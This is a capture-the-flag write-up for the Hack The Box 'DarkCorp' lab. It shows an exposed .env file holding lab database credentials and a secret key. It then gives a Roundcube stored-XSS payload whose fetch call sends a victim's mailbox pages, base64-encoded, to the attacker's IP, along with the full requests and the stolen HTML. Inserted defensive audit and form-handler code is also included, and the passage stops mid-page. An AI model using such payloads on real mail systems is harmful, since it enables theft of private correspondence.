Hackthebox: DarkCorp

Foued SAIDI Lv5

Overview

DarkCorp is an insane-difficulty machine from Hack The Box with the following scenario: Recon -> Roundcube stored XSS (contact form) -> Mail exfiltration via XSS -> Capture password-reset tokens -> Password reset takeover -> SQL injection (pg_read_file) -> .env disclosure (DB creds, secrets) -> PKINIT / certificate auth to get TGT -> Recover machine nthash (WEB-01$) -> Kerberos ticket forging (ticketer.py) / pass-the-ticket -> Dump NTDS / SAM / LSA (secretsdump) -> PetitPotam / EfsRpc NTLM relay techniques -> GPO abuse (pyGPOAbuse) to create scheduled task -> Add local admin / escalate via GPO -> Remote code execution / shell via Evil-WinRM -> DPAPI / CredMan extraction (DonPAPI) -> Extracted plaintext Administrator credentials -> Privilege escalation to Administrator.

DarkCorp

Reconnaissance

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
|_ 256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
80/tcp open http nginx 1.22.1
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.32 seconds

The box is listed as a Windows machine, yet the nmap scan shows a Linux host. That means we have a Linux machine that is joined to a domain with a domain controller.
Port 80 is open, which indicates a web application.
When we try to access it, we are redirected to http://mail.drip.htb/, so let's add that entry to our /etc/hosts file.

Roundcube

We have a Roundcube instance, which is basically an email solution, at version 1.6.7.
Doing some enumeration, we can also find this endpoint exposing .env data: http://drip.darkcorp.htb/dashboard/.env

# True for development, False for production
DEBUG=False

# Flask ENV
FLASK_APP=run.py
FLASK_ENV=development

# If not provided, a random one is generated
# SECRET_KEY=<YOUR_SUPER_KEY_HERE>

# Used for CDN (in production)
# No Slash at the end
ASSETS_ROOT=/static/assets

# If DB credentials (if NOT provided, or wrong values SQLite is used)
DB_ENGINE=postgresql
DB_HOST=localhost
DB_NAME=dripmail
DB_USERNAME=dripmail_dba
DB_PASS=2Qa2SsBkQvsc
DB_PORT=5432

SQLALCHEMY_DATABASE_URI = 'postgresql://dripmail_dba:2Qa2SsBkQvsc@localhost/dripmail'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SECRET_KEY = 'GCqtvsJtexx5B7xHNVxVj0y2X0m10jq'
MAIL_SERVER = 'drip.htb'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USE_SSL = False
MAIL_USERNAME = None
MAIL_PASSWORD = None
MAIL_DEFAULT_SENDER = '[email protected]'
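
As an added example (not part of the original write-up), the following Python audit parses a file in the same mixed .env style and lists which settings need rotation or review once the file has been readable over HTTP. The sample content and all its values are constructed placeholders, and the rule set is an assumption of this example.

```python
"""Audit a .env-style file for settings that matter once it has been exposed."""
import re
from urllib.parse import urlsplit

# Constructed sample in the two styles the exposed file mixes
# (KEY=value and KEY = 'value'); every value here is a placeholder.
SAMPLE_ENV = """\
# True for development, False for production
DEBUG=False
FLASK_ENV=development
# SECRET_KEY=<YOUR_SUPER_KEY_HERE>
DB_ENGINE=postgresql
DB_USERNAME=app_dba
DB_PASS=example-db-password
SQLALCHEMY_DATABASE_URI = 'postgresql://app_dba:example-db-password@localhost/appdb'
SECRET_KEY = 'example-flask-secret'
MAIL_USE_TLS = False
MAIL_PASSWORD = None
"""

# Assumed naming heuristics for keys that hold secrets.
SECRET_NAME = re.compile(r"(PASS|PASSWORD|SECRET|TOKEN|API_?KEY)", re.I)
EMPTY_VALUES = {"", "none", "null"}


def parse_env(text):
    """Return {key: value} for assignment lines, skipping comments and blanks."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        value = value.strip()
        # Drop one pair of matching surrounding quotes.
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
            value = value[1:-1]
        settings[key.strip()] = value
    return settings


def uri_has_password(value):
    """True when a scheme://user:password@host style value carries a password."""
    if "://" not in value:
        return False
    try:
        return bool(urlsplit(value).password)
    except ValueError:  # malformed netloc: nothing usable to report
        return False


def audit_env(text):
    """Return sorted (key, finding) tuples; secret values are never echoed."""
    findings = []
    for key, value in parse_env(text).items():
        if SECRET_NAME.search(key) and value.lower() not in EMPTY_VALUES:
            findings.append((key, "plaintext secret, rotate after exposure"))
        if uri_has_password(value):
            findings.append((key, "connection URI embeds a password"))
        if key == "FLASK_ENV" and value.lower() == "development":
            findings.append((key, "development mode on a reachable host"))
        if key == "MAIL_USE_TLS" and value.lower() == "false":
            findings.append((key, "mail transport without TLS"))
    return sorted(findings)


if __name__ == "__main__":
    for key, finding in audit_env(SAMPLE_ENV):
        print(f"{key}: {finding}")
```

The underlying fix is to keep dotfiles out of the served directory or deny them at the web server; the audit only scopes the cleanup.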

Playing with the contact form under /contact, we can change the destination email in the request to our own address, and we receive this:

Confidentiality Notice: This electronic communication may contain confidential or privileged information. Any unauthorized review, use, disclosure, copying, distribution, or taking of any part of this email is strictly prohibited.  
If you suspect that you've received a "phishing" e-mail, please forward the entire email to our security engineer at [email protected]

With some googling, we also find that there is an XSS in Roundcube v1.6.7, which we can trigger through the contact form against the bcase user.
This will be our payload:

name=kujen&[email protected]&message=<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=fetch('/?_task=mail&_action=show&_uid=3&_mbox=INBOX&_extwin=1').then(r=>r.text()).then(t=>fetch(`http://10.10.16.20/c=${btoa(t)}`))  foo=bar">Foo</body>&content=html&[email protected]

We URL-encode it and place it in the request:

POST /contact HTTP/1.1
Host: drip.htb
Content-Length: 440
Cache-Control: max-age=0
Origin: http://drip.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-GPC: 1
Accept-Language: en-US,en;q=0.6
Referer: http://drip.htb/index
Accept-Encoding: gzip, deflate, br
Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiN2RlMTc2YWJmYzA5NDc3NDZlYjExOGYzYWEyODJkYWVmZTE3YWM1NCJ9.Z65HuQ.PAgXqD2w-R0gz0_G3BuKM-Lon84
Connection: keep-alive

name=kujen&email=kujen&message=%3Cbody%20title%3D%22bgcolor%3Dfoo%22%20name%3D%22bar%20style%3Danimation-name%3Aprogress-bar-stripes%20onanimationstart%3Dfetch%28%27%2F%3F_task%3Dmail%26_action%3Dshow%26_uid%3D3%26_mbox%3DINBOX%26_extwin%3D1%27%29.then%28r%3D%3Er.text%28%29%29.then%28t%3D%3Efetch%28%60http%3A%2F%2F10.10.16.20%2Fc%3D%24%7Bbtoa%28t%29%7D%60%29%29%20%20foo%3Dbar%22%3EFoo%3C%2Fbody%3E&content=html&recipient=bcase%40drip.htb
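
The request above works because the form handler accepts the recipient and content fields from the client. The following is an added example of a handler that does not (it is not the target application's code; the mailbox addresses, limits and function names are assumptions): it builds the message with a fixed recipient and a text/plain body, so markup in the message field arrives as literal text rather than as an HTML part.

```python
"""Contact-form handling that keeps routing and content type server-side."""
import re
from email.message import EmailMessage
from urllib.parse import parse_qs

# Assumed server-side settings (placeholders, not values from the target).
SUPPORT_MAILBOX = "support@example.invalid"
FORM_SENDER = "webform@example.invalid"
ALLOWED_FIELDS = {"name", "email", "message"}
MAX_MESSAGE_LEN = 4000
ADDRESS = re.compile(r"[^@\s<>,;]+@[^@\s<>,;]+")

# Constructed request body shaped like the one above: HTML in `message`
# plus the two client-supplied routing fields, `content` and `recipient`.
SAMPLE_BODY = (
    "name=visitor&email=visitor%40example.invalid"
    "&message=%3Cbody%20onanimationstart%3Dx%3EFoo%3C%2Fbody%3E"
    "&content=html&recipient=someone%40example.invalid"
)


def _one_line(value, limit):
    """Collapse whitespace (including CR/LF) so a field cannot add headers."""
    return " ".join(value.split())[:limit]


def build_contact_mail(raw_body):
    """Return (EmailMessage, ignored_fields) for a urlencoded form body."""
    parsed = parse_qs(raw_body, keep_blank_values=True)
    form = {key: values[0] for key, values in parsed.items()}
    # Anything outside the allowlist is dropped and reported, never honoured.
    ignored = sorted(set(form) - ALLOWED_FIELDS)

    name = _one_line(form.get("name", ""), 100)
    reply_to = _one_line(form.get("email", ""), 254)
    text = form.get("message", "")[:MAX_MESSAGE_LEN]

    msg = EmailMessage()
    msg["From"] = FORM_SENDER
    msg["To"] = SUPPORT_MAILBOX  # fixed; never read from the request
    msg["Subject"] = f"Contact form: {name or 'anonymous'}"
    if ADDRESS.fullmatch(reply_to):
        msg["Reply-To"] = reply_to
    # Always text/plain: markup in the message is delivered as literal text.
    msg.set_content(text, subtype="plain", charset="utf-8")
    return msg, ignored


if __name__ == "__main__":
    mail, dropped = build_contact_mail(SAMPLE_BODY)
    print("ignored fields:", dropped)
    print(mail)
```

Logging the ignored fields gives a cheap signal that someone is tampering with the form, and the handler complements, rather than replaces, updating the webmail client.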

We will receive this on our local http server:

PS C:\Users\0xkujen> python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.129.161.63 - - [13/Feb/2025 20:22:41] code 404, message File not found
::ffff:10.129.161.63 - - [13/Feb/2025 20:22:41] "GET /c=<base64 of the fetched page> HTTP/1.1" 404 -

It decodes to:

<!DOCTYPE html>

<html lang="en">

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>DripMail Webmail :: Customer Information Request</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no, maximum-scale=1.0"><meta name="theme-color" content="#f4f4f4"><meta name="msapplication-navbutton-color" content="#f4f4f4">
<link rel="shortcut icon" href="skins/elastic/images/favicon.ico?s=1716107237">
<link rel="stylesheet" href="skins/elastic/deps/bootstrap.min.css?s=1716107245">

<link rel="stylesheet" href="skins/elastic/styles/styles.min.css?s=1716107237">



<script>
try {
if (document.cookie.indexOf('colorMode=dark') > -1
|| (document.cookie.indexOf('colorMode=light') === -1 && window.matchMedia('(prefers-color-scheme: dark)').matches)
) {
document.documentElement.className += ' dark-mode';
}
} catch (e) { }
</script>

<link rel="stylesheet" type="text/css" href="plugins/jqueryui/themes/elastic/jquery-ui.min.css?s=1716107237"><script src="program/js/jquery.min.js?s=1716107242"></script><script src="program/js/common.min.js?s=1716107237"></script><script src="program/js/app.min.js?s=1716107237"></script><script>
/*
@licstart The following is the entire license notice for the
JavaScript code in this page.

Copyright (C) The Roundcube Dev Team

The JavaScript code in this page is free software: you can redistribute
it and/or modify it under the terms of the GNU General Public License
as published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.

The code is distributed WITHOUT ANY WARRANTY; without even the implied
warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU GPL for more details.

@licend The above is the entire license notice
for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"mail","standard_windows":false,"locale":"en_US","devel_mode":null,"rcversion":10607,"cookie_domain":"","cookie_path":"/","cookie_secure":false,"dark_mode_support":true,"skin":"elastic","extwin":1,"blankpage":"skins/elastic/watermark.html","refresh_interval":10,"session_lifetime":600,"action":"show","comm_path":"/?_task=mail","user_id":"twZLggeBqoXLUfNK","compose_extwin":false,"date_format":"yy-mm-dd","date_format_localized":"YYYY-MM-DD","browser_capabilities":{"pdf":"1","flash":"0","tiff":"0","webp":"1","pgpmime":"0"},"uid":"3","safemode":true,"message_context":null,"message_flags":["seen"],"sender":"kujen \[email protected]\u003E","mailbox":"INBOX","username":"bcase","permaurl":"/?_task=mail&_action=show&_uid=3&_mbox=INBOX","has_writeable_addressbook":true,"delimiter":".","mimetypes":["text/plain","text/html","image/jpeg","image/gif","image/png","image/bmp","image/tiff","image/webp","application/x-javascript","application/pdf","message/rfc822"],"read_when_deleted":true,"display_next":true,"optional_format":"text","mailboxes":{"INBOX":{"id":"INBOX","name":"Inbox","virtual":false,"class":"inbox"}},"mailboxes_list":["INBOX"],"request_token":"QpdT8JMZkK0l5s23G8KkDNgOQl7p9Cca"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing...","windowopenerror":"The popup window was blocked!","uploadingmany":"Uploading files...","uploading":"Uploading file...","close":"Close","save":"Save","cancel":"Cancel","alerttitle":"Attention","confirmationtitle":"Are you sure...","delete":"Delete","continue":"Continue","ok":"OK","checkingmail":"Checking for new messages...","deletemessage":"Delete message","movemessagetotrash":"Move message to trash","movingmessage":"Moving message(s)...","deletingmessage":"Deleting message(s)...","markingmessage":"Marking message(s)...","replyall":"Reply all","replylist":"Reply list","bounce":"Resend","bouncemsg":"Resend (bounce)","sendingmessage":"Sending message...","back":"Back","errortitle":"An error occurred!","options":"Options","plaintoggle":"Plain text","htmltoggle":"HTML","previous":"Previous","next":"Next","select":"Select","browse":"Browse","choosefile":"Choose file...","choosefiles":"Choose files...","purgefolderconfirm":"Do you really want to delete all messages in this folder?","deletemessagesconfirm":"Do you really want to delete selected message(s)?","viewsource":"Show source","details":"Details","summary":"Summary","arialabelmessageheaders":"Message headers"});
rcmail.gui_container("toolbar","mailtoolbar");
rcmail.gui_container("forwardmenu","forward-menu");
rcmail.gui_container("replyallmenu","replyall-menu");
rcmail.gui_container("messagemenu","message-menu");
rcmail.gui_container("markmenu","markmessage-menu");
rcmail.gui_container("headerlinks","header-links");
rcmail.gui_container("attachmentmenu","attachmentmenu");
rcmail.gui_container("mailtomenu","mailto-menu");rcmail.register_button('compose', 'rcmbtn100', 'link', '', '', '');
rcmail.register_button('reply', 'rcmbtn101', 'link', 'reply', '', '');
rcmail.register_button('reply-all', 'rcmbtn102', 'link', 'reply-all', '', '');
rcmail.register_button('forward', 'rcmbtn103', 'link', 'forward', '', '');
rcmail.register_button('delete', 'rcmbtn104', 'link', 'delete', '', '');
rcmail.register_button('print', 'rcmbtn105', 'link', 'print', '', '');
rcmail.register_button('previousmessage', 'rcmbtn106', 'link', 'prev', '', '');
rcmail.register_button('nextmessage', 'rcmbtn107', 'link', 'next', '', '');
rcmail.register_button('forward-inline', 'rcmbtn108', 'link', 'forward inline active', '', '');
rcmail.register_button('forward-attachment', 'rcmbtn109', 'link', 'forward attachment active', '', '');
rcmail.register_button('bounce', 'rcmbtn110', 'link', 'forward bounce active', '', '');
rcmail.register_button('reply-all', 'rcmbtn111', 'link', 'reply all active', '', '');
rcmail.register_button('reply-list', 'rcmbtn112', 'link', 'reply list active', '', '');
rcmail.register_button('print', 'rcmbtn113', 'link', 'print active', '', '');
rcmail.register_button('download', 'rcmbtn114', 'link', 'download active', '', '');
rcmail.register_button('edit', 'rcmbtn115', 'link', 'edit asnew active', '', '');
rcmail.register_button('viewsource', 'rcmbtn116', 'link', 'source active', '', '');
rcmail.register_button('move', 'rcmbtn117', 'link', 'move active', '', '');
rcmail.register_button('copy', 'rcmbtn118', 'link', 'copy active', '', '');
rcmail.register_button('open', 'rcmbtn119', 'link', 'extwin active', '', '');
rcmail.register_button('mark', 'rcmbtn120', 'link', 'read active', '', '');
rcmail.register_button('mark', 'rcmbtn121', 'link', 'unread active', '', '');
rcmail.register_button('mark', 'rcmbtn122', 'link', 'flag active', '', '');
rcmail.register_button('mark', 'rcmbtn123', 'link', 'unflag active', '', '');
rcmail.register_button('change-format', 'rcmbtn124', 'link', '', '', '');
rcmail.gui_object('remoteobjectsmsg', 'remote-objects-message');
rcmail.gui_object('messagebody', 'messagebody');
rcmail.register_button('open-attachment', 'attachmenuopen', 'link', 'extwin active', '', '');
rcmail.register_button('download-attachment', 'attachmenudownload', 'link', 'download active', '', '');
rcmail.gui_object('message', 'messagestack');
</script>

<script src="plugins/jqueryui/js/jquery-ui.min.js?s=1716107237"></script>
</head>
<body class="task-mail action-show">

<div id="layout">






<h1 class="voice">Message preview</h1>

<div id="layout-content" class="selected">

<h2 id="aria-label-toolbar" class="voice">Application toolbar</h2>
<div class="header" role="toolbar" aria-labelledby="aria-label-toolbar">
<a class="button icon back-list-button" href="#back"><span class="inner">Back</span></a>
<span class="header-title"></span>

<div id="mailtoolbar" class="toolbar menu" role="toolbar">
<a class="compose hidden" title="Create a new message" id="rcmbtn100" role="button" href="/?_task=mail&amp;_action=compose" onclick="return rcmail.command('compose','',this,event)"><span class="inner">Compose</span></a>
<a class="reply disabled" title="Reply to sender" data-content-button="true" id="rcmbtn101" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply','',this,event)"><span class="inner">Reply</span></a>
<span class="dropbutton">
<a class="reply-all disabled" title="Reply to list or to sender and all recipients" id="rcmbtn102" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply-all','',this,event)"><span class="inner">Reply all</span></a>
<a href="#reply-all" id="replyallmenulink" class="dropdown" data-popup="replyall-menu" tabindex="0">
<span class="inner">Reply-all options</span>
</a>
</span>
<span class="dropbutton">
<a class="forward disabled" title="Forward the message" id="rcmbtn103" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('forward','',this,event)"><span class="inner">Forward</span></a>
<a href="#forward" id="forwardmenulink" class="dropdown" data-popup="forward-menu" tabindex="0">
<span class="inner">Forwarding options</span>
</a>
</span>
<span class="spacer"></span>
<a class="delete disabled" title="Delete message" id="rcmbtn104" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('delete','',this,event)"><span class="inner">Delete</span></a>

<a class="print disabled" title="Print this message" data-hidden="small" id="rcmbtn105" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('print','',this,event)"><span class="inner">Print</span></a>


<a id="markmessagemenulink" class="markmessage" title="Mark messages" data-popup="markmessage-menu" role="button" href="#"><span class="inner">Mark</span></a>
<a id="messagemenulink" class="more" title="More actions..." data-popup="message-menu" role="button" href="#"><span class="inner">More</span></a>

<span class="spacer"></span>
<a class="prev disabled" title="Show previous message" data-hidden="small" id="rcmbtn106" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('previousmessage','',this,event)"><span class="inner">Previous</span></a>
<a class="next disabled" title="Show next message" data-hidden="small" id="rcmbtn107" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('nextmessage','',this,event)"><span class="inner">Next</span></a>

</div>

<div id="forward-menu" class="popupmenu">
<h3 id="aria-label-forward-menu" class="voice">Forwarding options</h3>
<ul class="menu listing" role="menu" aria-labelledby="aria-label-forward-menu">
<li role="menuitem"><a class="forward inline disabled" id="rcmbtn108" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('forward-inline','sub',this,event)">Forward inline</a></li>
<li role="menuitem"><a class="forward attachment disabled" id="rcmbtn109" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('forward-attachment','sub',this,event)">Forward as attachment</a></li>
<li role="menuitem"><a class="forward bounce disabled" id="rcmbtn110" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('bounce','',this,event)">Resend (bounce)</a></li>

</ul>
</div>

<div id="replyall-menu" class="popupmenu">
<h3 id="aria-label-replyall-menu" class="voice">Reply-all options</h3>
<ul class="menu listing" role="menu" aria-labelledby="aria-label-replyall-menu">
<li role="menuitem"><a class="reply all disabled" id="rcmbtn111" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply-all','sub',this,event)">Reply all</a></li>
<li role="menuitem"><a class="reply list disabled" id="rcmbtn112" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('reply-list','sub',this,event)">Reply list</a></li>

</ul>
</div>

<div id="message-menu" class="popupmenu">
<h3 id="aria-label-message-menu" class="voice">More message actions</h3>
<ul class="menu listing" role="menu" aria-labelledby="aria-label-message-menu">
<li role="menuitem"><a class="print disabled" data-hidden="small" id="rcmbtn113" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('print','',this,event)">Print this message</a></li>

<li role="menuitem"><a class="download disabled" id="rcmbtn114" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('download','',this,event)">Export</a></li>
<li role="menuitem"><a class="edit asnew disabled" id="rcmbtn115" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('edit','new',this,event)">Edit as new</a></li>
<li role="menuitem"><a class="source disabled" id="rcmbtn116" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('viewsource','',this,event)">Show source</a></li>
<li role="menuitem"><a class="move disabled" aria-haspopup="true" id="rcmbtn117" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('move','',this,event)"><span class="folder-selector-link">Move to...</span></a></li>
<li role="menuitem"><a class="copy disabled" aria-haspopup="true" id="rcmbtn118" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('copy','',this,event)"><span class="folder-selector-link">Copy to...</span></a></li>
<li role="menuitem"><a target="_blank" class="extwin disabled" data-hidden="small" id="rcmbtn119" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('open','',this,event)">Open in new window</a></li>

</ul>
</div>

<div id="markmessage-menu" class="popupmenu">
<h3 id="aria-label-markmessage-menu" class="voice">Mark selected messages as...</h3>
<ul class="menu listing" role="menu" aria-labelledby="aria-label-markmessage-menu">
<li role="menuitem"><a class="read disabled" id="rcmbtn120" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','read',this,event)">As read</a></li>
<li role="menuitem"><a class="unread disabled" id="rcmbtn121" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','unread',this,event)">As unread</a></li>
<li role="menuitem"><a class="flag disabled" id="rcmbtn122" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','flagged',this,event)">As flagged</a></li>
<li role="menuitem"><a class="unflag disabled" id="rcmbtn123" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('mark','unflagged',this,event)">As unflagged</a></li>


</ul>
</div>



</div>

<div class="content frame-content" role="main">
<div id="message-header">
<h2 class="subject">
<span class="voice">Subject: </span>
Customer Information Request

</h2>
<div class="header">
<img src="/?_task=addressbook&amp;_action=photo&amp;_email=kujen%40drip.htb&amp;_error=1&amp;_bgcolor=transparent" alt="Contact photo" class="contactphoto" onerror="this.onerror = null; this.src = 'skins/elastic/images/contactpic.svg';">
<div class="header-content">
<div class="header-summary"><span>From <span class="adr"><a href="mailto:[email protected]" class="rcmContactAddress" onclick="return rcmail.command('compose','kujen &lt;[email protected]&gt;',this)" title="[email protected]">kujen</a><a href="#add" title="Add to address book" class="rcmaddcontact" onclick="return rcmail.command('add-contact','kujen &lt;[email protected]&gt;',this)"></a></span> on <span class="text-nowrap">2025-02-13 12:30</span></span></div>
<table class="header-headers"><tbody><tr><td class="header-title">From</td><td class="header from"><span class="adr"><a href="mailto:[email protected]" class="rcmContactAddress" onclick="return rcmail.command('compose','kujen &lt;[email protected]&gt;',this)" title="[email protected]">kujen</a><a href="#add" title="Add to address book" class="rcmaddcontact" onclick="return rcmail.command('add-contact','kujen &lt;[email protected]&gt;',this)"></a></span></td></tr><tr><td class="header-title">To</td><td class="header to"><span class="adr"><a href="mailto:[email protected]" class="rcmContactAddress" onclick="return rcmail.command('compose','[email protected]',this)" title="[email protected]">[email protected]</a><a href="#add" title="Add to address book" class="rcmaddcontact" onclick="return rcmail.command('add-contact','[email protected]',this)"></a></span></td></tr><tr><td class="header-title">Reply-To</td><td class="header replyto"><span class="adr"><a href="mailto:[email protected]" class="rcmContactAddress" onclick="return rcmail.command('compose','[email protected]',this)" title="[email protected]">[email protected]</a><a href="#add" title="Add to address book" class="rcmaddcontact" onclick="return rcmail.command('add-contact','[email protected]',this)"></a></span></td></tr><tr><td class="header-title">Date</td><td class="header date">Today 12:30</td></tr></tbody></table>
<div class="header-links">


<a href="#headers" class="headers-summary" onclick="return UI.headers_show(true)"></a>
<a href="#all-headers" class="headers-all" onclick="return UI.headers_dialog()">Headers</a>


<a class="plain" title="Display in plain text format" id="rcmbtn124" role="button" href="#" onclick="return rcmail.command('change-format','text',this,event)"><span class="inner">Plain text</span></a>


</div>
</div>
</div>
</div>
<div id="message-content">
<div class="leftcol" role="region" aria-labelledby="aria-label-messageattachments">
<h2 id="aria-label-messageattachments" class="voice">Attachments</h2>

</div>
<div class="rightcol" role="region" aria-labelledby="aria-label-messagebody">
<h2 id="aria-label-messagebody" class="voice">Message Body</h2>
<div id="message-objects">
<div id="remote-objects-message" class="notice" style="display: none"><span>To protect your privacy remote resources have been blocked.</span>&nbsp;<span class="boxbuttons"><a href="#loadremote" onclick="rcmail.command('load-remote')">Allow</a></span></div>
</div>
<div id="messagebody"><div class="message-htmlpart" id="message-htmlpart1" style="background-color: foo"><!-- html ignored --><!-- head ignored --><!-- meta ignored --><div class="rcmBody" title=" name="bar style=animation-name:progress-bar-stripes onanimationstart=fetch(&#039;/?_task=mail&amp;_action=show&amp;_uid=3&amp;_mbox=INBOX&amp;_extwin=1&#039;).then(r=&gt;r.text()).then(t=&gt;fetch(`http://10.10.16.20/c=${btoa(t)}`)) foo=bar">Foo</div>









Confidentiality Notice: This electronic communication may contain confidential or privileged information. Any unauthorized review, use, disclosure, copying, distribution, or taking of any part of this email is strictly prohibited.
If you suspect that you've received a &quot;phishing&quot; e-mail, please forward the entire email to our security engineer at [email protected]</div></div>
</div>
</div>
</div>
</div>

<!-- popup menus -->
<div id="attachmentmenu" class="popupmenu">
<h3 id="aria-label-attachmentmenu" class="voice">Attachment options</h3>
<ul class="menu listing" role="menu" aria-labelledby="aria-label-attachmentmenu">
<li role="menuitem"><a id="attachmenuopen" class="extwin disabled" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('open-attachment','',this,event)">Open</a></li>
<li role="menuitem"><a id="attachmenudownload" class="download disabled" role="button" tabindex="-1" aria-disabled="true" href="#" onclick="return rcmail.command('download-attachment','',this,event)">Download</a></li>

</ul>
</div>

<div id="mailto-menu" class="popupmenu">
<h3 id="aria-label-mailtomenu" class="voice">Email address options</h3>
<ul class="menu listing" role="menu" aria-labelledby="aria-label-mailtomenu">
<li role="menuitem"><a class="addressbook" id="rcmbtn125" role="button" tabindex="-1" aria-disabled="true" href="#">Add to address book</a></li>
<li role="menuitem"><a class="compose" id="rcmbtn126" role="button" tabindex="-1" aria-disabled="true" href="#">Compose mail to</a></li>

</ul>
</div>


</div>



<div id="messagestack"></div>
<script>
$(function() {
rcmail.init();
});
</script>



<script src="skins/elastic/deps/bootstrap.bundle.min.js?s=1716107245"></script>
<script src="skins/elastic/ui.min.js?s=1716107237"></script>

</body>
</html>

Now we do all of it again but with uid=2:

POST /contact HTTP/1.1
Host: drip.htb
Content-Length: 440
Cache-Control: max-age=0
Origin: http://drip.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-GPC: 1
Accept-Language: en-US,en;q=0.6
Referer: http://drip.htb/index
Accept-Encoding: gzip, deflate, br
Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiN2RlMTc2YWJmYzA5NDc3NDZlYjExOGYzYWEyODJkYWVmZTE3YWM1NCJ9.Z65HuQ.PAgXqD2w-R0gz0_G3BuKM-Lon84
Connection: keep-alive

name=kujen&email=kujen&message=%3Cbody%20title%3D%22bgcolor%3Dfoo%22%20name%3D%22bar%20style%3Danimation-name%3Aprogress-bar-stripes%20onanimationstart%3Dfetch%28%27%2F%3F_task%3Dmail%26_action%3Dshow%26_uid%3D2%26_mbox%3DINBOX%26_extwin%3D1%27%29.then%28r%3D%3Er.text%28%29%29.then%28t%3D%3Efetch%28%60http%3A%2F%2F10.10.16.20%2Fc%3D%24%7Bbtoa%28t%29%7D%60%29%29%20%20foo%3Dbar%22%3EFoo%3C%2Fbody%3E&content=html&recipient=bcase%40drip.htb

We receive another base64 value that we decode into another page:

<!DOCTYPE html>

<html lang="en">

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>DripMail Webmail :: Analytics Dashboard</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no, maximum-scale=1.0"><meta name="theme-color" content="#f4f4f4"><meta name="msapplication-navbutton-color" content="#f4f4f4">
<link rel="shortcut icon" href="skins/elastic/images/favicon.ico?s=1716107237">
<link rel="stylesheet" href="skins/elastic/deps/bootstrap.min.css?s=1716107245">

<link rel="stylesheet" href="skins/elastic/styles/styles.min.css?s=1716107237">



<script>
try {
if (document.cookie.indexOf('colorMode=dark') > -1
|| (document.cookie.indexOf('colorMode=light') === -1 && window.matchMedia('(prefers-color-scheme: dark)').matches)
) {
document.documentElement.className += ' dark-mode';
}
} catch (e) { }
</script>

<link rel="stylesheet" type="text/css" href="plugins/jqueryui/themes/elastic/jquery-ui.min.css?s=1716107237"><script src="program/js/jquery.min.js?s=1716107242"></script><script src="program/js/common.min.js?s=1716107237"></script><script src="program/js/app.min.js?s=1716107237"></script><script>
/*
@licstart The following is the entire license notice for the
JavaScript code in this page.

